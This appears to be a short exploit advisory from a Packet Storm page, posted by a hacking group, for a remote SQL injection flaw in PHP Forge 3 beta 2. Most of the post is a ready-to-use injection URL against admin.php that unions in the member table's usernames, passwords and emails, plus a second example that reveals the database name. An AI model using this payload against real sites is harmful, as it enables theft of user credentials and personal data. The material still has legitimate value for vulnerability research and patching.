PHP Forge versions 3 beta 2 and below suffer from a remote SQL injection vulnerability.
3fc14bf379668653886dce5d675b2cb5e7c8193411cc69b3141202a0b3368b03=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author : jiko
# email : jalikom@hotmail.com
# Home : www.no-back.org
# Script : Forge 3.0 bĂȘta
# Bug : Remote SQL Injection Vulnerability
# Download : https://membres.lycos.fr/phpforge/downloads/phpforge3b2.tar.gz
=========================JIkI Team===================
# Exploit :
https://[Site]/[script]/https://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union select 0,identifiant,mdp,pseudo,email,description,6,7 from membres--
# Ex :
https://localhost/script/phpforge3/admin.php?module=news&p=modifier&id=-1 union select 0,1,database(),3,4,5,6,7 from membres--
=========================================================
greetz:
all my friend [kil1er & GhosT HaCkEr] and H-T Team and all No-back members and tryag.Com
visit: www.no-back.org & www.tryag.com
=========================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed